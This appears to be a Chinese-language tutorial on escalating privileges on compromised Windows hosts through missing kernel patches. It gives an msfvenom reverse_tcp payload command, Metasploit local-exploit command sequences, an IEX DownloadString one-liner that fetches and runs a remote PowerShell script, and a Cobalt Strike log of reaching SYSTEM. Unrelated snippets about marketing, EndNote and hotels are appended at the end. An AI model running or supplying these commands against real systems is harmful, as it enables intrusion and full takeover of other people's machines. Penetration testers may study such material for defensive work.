在后滲透測試階段,權限提升是一個繞不開的話題,其中"系統內核溢出提權"因其利用便捷成為了最為常用的方法,在使用該方法提權時我們只需要去查看目標系統中打了那些系統補丁,之后去找補丁的"互補"補丁,并利用對應的提權類的漏洞實現權限提升,本篇文章主要圍繞"系統內核溢出提權"的一些方法、思路進行簡易介紹~
在獲取到目標系統的shell后,我們需要先確認以下當前用戶以及用戶權限,這一點可以通過在shell中輸入"whoami"以及"whoami /groups"來確定:
whoamiwhoami /groups
從上面的顯示結果可以看到當前用戶為"?win-op8vb0nlureal1ex",權限為"Mandatory LabelMedium Mandatory Level",而這里的"Mandatory LabelMedium Mandatory Level"是一個標準的普通用戶權限,而我們再提權階段要做得就是將此處的"Medium Mandatory Level"提升為"High?Mandatory Level"。
利用系統溢出漏洞進行提權的關鍵是通過查看系統的補丁信息來找尋缺失的、可以利用來提權的補丁進行提權,下面介紹幾種常見的補丁查詢思路與方法
在Windows操作系統中我們可以通過執行systeminfo來查看目標機器上安裝的補丁信息:
systeminfo
從上圖可以看到這里安裝了三個補丁:
同時我們也可以通過WMIC來快速查看當前系統安裝的補丁信息:
wmic qfe get Caption,Description,HotFixID,InstalledOn
如果想要查詢系統是否安裝某一個特定的補丁,可以通過以下命令進行簡易查詢:
wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /c:"KB2534111" /c:"KB976902"
既然已經確定了當前系統的補丁信息,那么后續如何利用呢?當然是去查找缺失的、可以利用的補丁了!但是怎么找呢?不可能在茫茫大海中找吧?當然不是,這里推薦一個輔助網站:https://bugs.hacking8.com/tiquan/
我們可以在"補丁號"選項框中輸入當前系統的補丁信息,之后進行查詢來獲取當前系統的缺失的、可以利用的補丁信息,這里以上面查詢的補丁信息為例:
之后可以根據補丁來推薦相關的漏洞利用EXP,不過在使用EXP時還需要主要影響的操作系統:
關于提權類的EXP,這里推薦一個項目:https://github.com/Al1ex/WindowsElevation
該項目源自SecWiki維護的Windows-kernel-exploit,但是由于原作者不再更新與維護所以后期由筆者重新進行構建維護,同時也涵蓋了Bypass UAC系列,目前還在不斷的更新與完善中,同時該項目也主要用于收集網絡上公開的各大有價值的漏洞EXP/POC~
MSF框架中自帶提權輔助功能模塊——post/windows/gather/enum_pathes,該模塊會根據漏洞編號快速查找目標系統中的補丁信息,下面以目標主機為例做一個簡單的演示:
首先,我們需要獲取目標主機的一個Shell,這里我們再測試環境中直接通過MSFvenom來生成Payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.188.129 LPORT=4444 -f exe > shell.exe
之后在MSF中設置監聽:
之后再目標主機中執行EXE
之后成功返回會話:
之后在Meterpreter中執行如下命令即可查看系統補丁信息(老版本的會給出可用的EXP,MSF5好像不提供了):
run post/windows/gather/enum_patches
于此同時,我們也可以通過執行以下命令來查看目標系統可用的漏洞,之后探尋提權EXP:
run post/multi/recon/local_exploit_suggester
其他一些常見的模塊例如:
Windows ClientCopyImage Win32k Exploit:
Windows內核模式驅動程序中的漏洞可能允許特權提升,此模塊利用win32k.sys內核模式驅動程序中不正確的對象處理,此模塊已在Windows 7 x64和x86、Windows 2008 r2 sp1 x64的易受攻擊版本上進行了測試
use exploit/windows/local/ms15_051_client_copy_imageset lhost 192.168.1.107set session 1exploit
Windows TrackPopupMenu Win32k NULL Pointer Dereference:
此模塊已在Windows xp sp3、Windows server 2003 sp2、Windows 7 sp1、Windows server 2008 r2位和Windows server 2008 r2 sp1 64位上進行了測試
use exploit/windows/local/ms14_058_track_popup_menuset lhost 192.168.1.107set session 1exploit
Windows SYSTEM Escalation via KiTrap0D:
use exploit/windows/local/ms10_015_kitrap0dset lhost 192.168.1.107set session 1exploit
Windows Escalate Task Scheduler XML Privilege Escalation:
use exploit/windows/local/ms10_092_schelevatorset lhost 192.168.1.107set session 1exploit
MS16-016 mrxdav.sys WebDav Local Privilege Escalation:
use exploit/windows/local/ms16_016_webdavset lhost 192.168.1.107set session 1exploit
EPATHOBJ::pprFlattenRec Local Privilege Escalation:
use exploit/windows/local/ppr_flatten_recset lhost 192.168.1.107set session 1exploit
MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow:
use exploit/windows/local/ms13_053_ schlampereiset lhost 192.168.1.107set session 1exploit
MS16-032 Secondary Logon Handle Privilege Escalation:
use exploit/windows/local/ms16_032_secondary_logon_handle_privescset session 1exploit
Empire框架也提供了關于內核溢出漏洞提權的漏洞利用方法,下面進行簡單演示:
usemodule privesc/powerup/allchecksexecute
PS:總體來看效果不是很理想,不如MSF~
Sherlock(https://github.com/rasta-mouse/Sherlock)是一個在Windows下用于本地提權的PowerShell腳本,目前包含了以下漏洞:
該工具的利用也是較為簡單,首先下載項目到本地,之后再終端調用Sherlock(獲取webshell的主機中直接上傳即可):
Import-Module .Sherlock.ps1
當然也可以遠程加載:
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1')
之后執行以下命令來列舉當前系統中所有可利用的漏洞:
Find-AllVulns
當然你也可以搜索某一個特定漏洞,例如:
Find-CVE20177199
根據Sherlock的說明目前CS已經可以實現" 導入模塊——>查詢單一漏洞——>直接提權 "的一套流程了,下面是Github中的實例:
beacon> getuid[*] Tasked beacon to get userid[+] host called home, sent: 20 bytes[*] You are Win7-x64Rastabeacon> powershell-import C:UsersRastaDesktopSherlock.ps1[*] Tasked beacon to import: C:UsersRastaDesktopSherlock.ps1[+] host called home, sent: 2960 bytesbeacon> powershell Find-MS14058[*] Tasked beacon to run: Find-MS14058[+] host called home, sent: 20 bytes[+] received output:Title : TrackPopupMenu Win32k Null Pointer DereferenceMSBulletin : MS14-058CVEID : 2014-4113Link : https://www.exploit-db.com/exploits/35101/VulnStatus : Appears Vulnerablebeacon> elevate ms14-058 smb[*] Tasked beacon to elevate and spawn windows/beacon_smb/bind_pipe (127.0.0.1:1337)[+] host called home, sent: 105015 bytes[+] received output:[*] Getting Windows version...[*] Solving symbols...[*] Requesting Kernel loaded modules...[*] pZwQuerySystemInformation required length 51216[*] Parsing SYSTEM_INFO...[*] 173 Kernel modules found[*] Checking module SystemRootsystem32ntoskrnl.exe[*] Good! nt found as ntoskrnl.exe at 0x0264f000[*] ntoskrnl.exe loaded in userspace at: 40000000[*] pPsLookupProcessByProcessId in kernel: 0xFFFFF800029A21FC[*] pPsReferencePrimaryToken in kernel: 0xFFFFF800029A59D0[*] Registering class...[*] Creating window...[*] Allocating null page...[*] Getting PtiCurrent...[*] Good! dwThreadInfoPtr 0xFFFFF900C1E7B8B0[*] Creating a fake structure at NULL...[*] Triggering vulnerability...[!] Executing payload...[+] host called home, sent: 204885 bytes[+] established link to child beacon: 192.168.56.105beacon> getuid[*] Tasked beacon to get userid[+] host called home, sent: 8 bytes[*] You are NT AUTHORITYSYSTEM (admin)
PS:關于該Powershell的利用還有很多單一漏洞的查詢,讀者可以根據源碼進行分析~
Windows-Exploit-Suggester(https://github.com/GDSSecurity/Windows-Exploit-Suggester )是受Linux_Exploit_Suggester的啟發而開發的一款提權輔助工具,,它是用python開發而成,運行環境是python3.3及以上版本,且必須安裝xlrd,其主要功能是通過比對systeminfo生成的文件,從而發現系統是否存在未修復漏洞。
Windows-Exploit-Suggester通過下載微軟公開漏洞庫到本地“生成日期+mssb.xls”文件,然后根據操作系統版本,跟systeminfo生成的文件進行比對。微軟公開漏洞庫下載地址:http://www.microsoft.com/en-gb/download/confirmation.aspx?id=36982?。同時此工具還會告知用戶針對于此漏洞是否有公開的exp和可用的Metasploit模塊。
安裝依賴xlrd:
pip install xlrd
之后下載Windows-Exploit-Suggester項目到本地:
git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester
之后執行以下命令,自動從微軟官網下載安全公告數據庫,下載的文件會自動保存在當前目錄下:
./windows-exploit-suggester.py --update
之后在目標系統中獲取systeminfo信息并將其保存到一個txt文件夾中:
systeminfo > sysinfo.txt
之后將目標系統中的sysinfo.txt文件復制出來,到安裝有Windows-Exploit-Suggester的主機上去執行如下命令,查詢系統中存在的可用漏洞信息,這里的參數d為指定漏洞庫,也就是之前跟新漏洞庫后的xlsx文件:
./windows-exploit-suggester.py -d 2020-09-09-mssb.xls -i sysinfo.txt
總體上效果還不錯,挺讓人滿意的,不過該工具也有一個缺點——更新數據庫后下載的數據庫最新的2017年的,有點局限
最后給出一個常用的補丁列表信息,可能數據有點成舊哈~
CVE ID | MS ID | KB | Operating System |
---|---|---|---|
CVE-2003-0352 | MS03-026 | KB823980 | Windows 2003/XP/2000/NT 4.0/Server 2003 |
CVE-2005-1983 | MS05-039 | KB899588 | Windows 2000/XP SP1/Server 2003 |
CVE-2006-3439 | MS06-040 | KB921883 | Windows 2000/XP/Server 2003 |
CVE-2008-1084 | MS08-025 | KB941693 | Windows 2000/XP/Server 2003/Vista SP1/Server 2008 |
CVE-2008-3464 | MS08-066 | KB910723 | Windows XP/Server 2003 |
CVE-2008-4037 | MS08-068 | KB887429 | Windows XP/Server 2000/Vista/Server 2008 |
CVE-2008-4250 | MS08-067 | KB958644 | Windows XP/Vista/Server 2000 2003 2008 |
CVE-2009-0079 | MS09-012 | KB956572 | Windows XP/Server 2000 2003 2008/Vista |
CVE-2009-1535 | MS09-020 | KB970483 | Windows XP/Server 2000 2003 |
CVE-2009-2532 | MS09-050 | KB975517 | Windows Vista/Server 2008 |
CVE-2010-0020 | MS10-020 | KB980232 | Windows XP/2000/2003/2008/2008 R2/Vista/7 |
CVE-2010-0232 | MS10-015 | KB977165 | Windows 2000/XP/2003/Vista/2008/7 |
CVE-2010-1887 | MS10-048 | KB2160329 | Windows XP/2003/2008/7/Vista |
CVE-2010-1899 | MS10-065 | KB2271195 | Windows XP/2003/2008/7/Vista |
CVE-2010-2554 | MS10-059 | KB982799 | Window Vista/2008/7 |
CVE-2010-3338 | MS10-092 | KB2305420 | Windows Vista/7/2008 |
CVE-2010-4398 | MS11-011 | KB2393802 | Windows XP/Server 2003/Vsita/2008/7 |
CVE-2011-1249 | MS11-046 | KB2503665 | Windows XP/2003/2008 |
CVE-2011-1974 | MS11-062 | KB2566454 | Windows XP/2003 |
CVE-2011-2005 | MS11-080 | KB2592799 | Windows XP/Server 2003 |
CVE-2012-0002 | MS12-020 | KB2621440 | Winodws XP/2003/2008/Vista/7 |
CVE-2013-0008 | MS13-005 | KB2778930 | Windows Vista/2008/2012/7/8/RT |
CVE-2013-1300 | MS13-053 | KB2850851 | Windows XP/2003/2008/2012/7/8 |
CVE-2013-1332 | MS13-046 | KB2829361 | Windows XP/2003/2008/2012/7/8/RT |
CVE-2013-5065 | MS14-002 | KB2914368 | Windows XP/2003 |
CVE-2014-1767 | MS14-040 | KB2961072 | Windows XP/2003/2008/2012/7/8/RT/Vista |
CVE-2014-2814 | MS14-042 | KB2972621 | Windows Server 2008/2012 |
CVE-2014-4076 | MS14-070 | Windows 2003 | |
CVE-2014-4113 | MS14-058 | KB3000061 | Windows 2003/2008/2012/Vista/7/RT |
CVE-2014-6321 | MS14-066 | Windows server 2003/2008/2012/Vista/7 | |
CVE-2014-6324 | MS14-068 | Windows 2003/2008/2012/Vista/7/8 | |
CVE-2015-0002 | MS15-001 | Windows 7/8/2008/2012/ | |
CVE-2015-0057 | MS15-010 | Windows 2003/2008/2012/vista/7/8/RT | |
CVE-2015-0062 | MS15-015 | Windows 7/8/2008/2012/RT | |
CVE-2015-0097 | MS15-022 | Microsoft Office 2007/2010/2013/RT | |
CVE-2015-1701 | MS15-051 | KB3065979 | WIndows 2003/2008/2012/Vista/7/8 |
CVE-2015-1726 | MS15-061 | WIndows 2003/2008/2012/Vista/7/8 | |
CVE-2015-2370 | MS15-076 | WIndows 2003/2008/2012/Vista/7/8 | |
CVE-2015-2387 | MS15-077 | WIndows 2003/2008/2012/Vista/7/8 | |
CVE-2015-2517 | MS15-097 | KB3081455 | Windows 2003/2008/2012/Vista/RT/7/8/10 |
CVE-2016-0040 | MS16-014 | KB3135174 | Windows 2003/2008/2012/Vista/RT/7/8/10 |
CVE-2016-0051 | MS16-016 | KB3135173 | Windows 2003/2008/2012/Vista/RT/7/8/10 |
CVE-2016-0093 | MS16-034 | KB3140745 | Windows 2003/2008/2012/Vista/RT/7/8/10 |
CVE-2016-0099 | MS16-032 | KB3140768 | Windows 2003/2008/2012/Vista/RT/7/8/10 |
CVE-2016-3225 | MS16-075 | KB3163017 | Windows 2003/2008/2012/Vista/RT/7/8/10 |
CVE-2016-3305 | MS16-111 | KB3185611 | Windows 2008/2012/Vista/RT/7/8/10 |
CVE-2016-3308 | MS16-098 | KB3176492 | Windows 2008/2012/Vista/RT/7/8/10 |
CVE-2016-7214 | MS16-135 | KB3198234 | Windows Vista/2008/2012/2016/7/8 |
CVE-2017-0050 | MS17-017 | KB4011981 | Windows Vista/2008/2012/2016/7/8/10 |
CVE-2017-0143 | MS17-010 | Windows Vista/2008/2012/2016/7/8/10 | |
CVE-2017-0213 | KB4038788 | Windows Vista/2008/2012/2016/7/8/10 | |
CVE-2017-8464 | KB4022727 | Windows Vista/2008/2012/2016/7/8/10 | |
CVE-2018-0833 | KB4074594 | Windows 8/2012 R2/RT | |
CVE-2018-8120 | KB4103718 | Windows 2008/2008 R2/7 | |
CVE-2019-0803 | KB4493471 | Windows Vista/2008/2012/2016/2019/7/8/10 | |
CVE-2019-0863 | KB4494440 | Windows 2008/7/8/10 | |
CVE-2019-1253 | KB4515384 | Windows 10 1903/1709/1803/1703 | |
CVE-2019-1405 | KB4525235 | Windows 2008/2012/2016/2019/7/8/10 | |
CVE-2020-0668 | KB4532693 | Windows 2008/2012/2016/2019/7/8/10 | |
CVE-2020-0683 | KB4532691 | Windows 2008/2012/2016/2019/7/8/10 | |
CVE-2020-0787 | KB4541505 | Windows 2008/2012/2016/2019/7/8/10 | |
CVE-2020-0796 | KB4499165 | Windows 10 1909/1903/ | |
CVE-2020-1054 | KB4556826 | Windows 2008/2012/7/8/10 | |
CVE-2020-1066 | KB4552965 | Microsoft .NET Framework 3.5.1/3.0 | |
CVE-2020-1337 | KB4571694 | Windows 2012/7/10 | |
CVE-2020-1362 | KB4565503 | Windows 10 1903/1809/1607/2004/1709 |
本文由 貴州做網站公司 整理發布,部分圖文來源于互聯網,如有侵權,請聯系我們刪除,謝謝!
網絡推廣與網站優化公司(網絡優化與推廣專家)作為數字營銷領域的核心服務提供方,其價值在于通過技術手段與策略規劃幫助企業提升線上曝光度、用戶轉化率及品牌影響力。這...
在當今數字化時代,公司網站已成為企業展示形象、傳遞信息和開展業務的重要平臺。然而,對于許多公司來說,網站建設的價格是一個關鍵考量因素。本文將圍繞“公司網站建設價...
在當今的數字化時代,企業網站已成為企業展示形象、吸引客戶和開展業務的重要平臺。然而,對于許多中小企業來說,高昂的網站建設費用可能會成為其發展的瓶頸。幸運的是,隨...
endnote x4,怎么把插入word的作者跟年份變成數字上標。如圖?編輯輸出樣式之一已編號。就選這個吧。如果是上標,我今天找了很久才解決。首先檢查編號。然后點擊編輯輸出樣式編輯“編號”,選擇左側引文下的模板,選擇【書目編號】,設置為“上標”,即工具欄上的“A1”。你可以看到哪個上標被設置了。將其另存為您自己的命名樣式,例如“num”?,F在問題又來了。在word中將樣式設置為“num”,但是前面...
四川樂山到成都有多少公里?從樂山到成都開車總里程140.9公里,行車時間1小時37分,油費約89元,通過高速公路收費站總通行費約50元。還是比較快的。不開車的話,也可以選擇動車,挺好的,舒服又快。全程只需要一個小時,比開車還方便。成都到樂山開車要開多久?過路費多少?從成都開車到樂山有142.2公里。7座及以下乘用車收費55元,耗時2小時5分鐘,預計油費70元。樂山離四川市遠嗎?四川是一個省,樂山是...
北京南站附近有便宜旅館嗎?南站附近的酒店很難找。我在特價酒店聯盟上給你搜了一下,發現最近最便宜的是這家:北京新港快捷酒店,酒店地址:北京市豐臺區南三環西1號(北京南站南廣場,近洋橋),178元/晚。價格和你們的差不多。如果你對這家酒店不滿意,也可以登錄特價酒店聯盟自行了解。按酒店位置附近的地標搜索,很容易找到。酒店聯盟有哪些?“酒店”和“聯盟”,酒店是主體,聯盟是形式。當然,我們可以理解為酒店聯盟...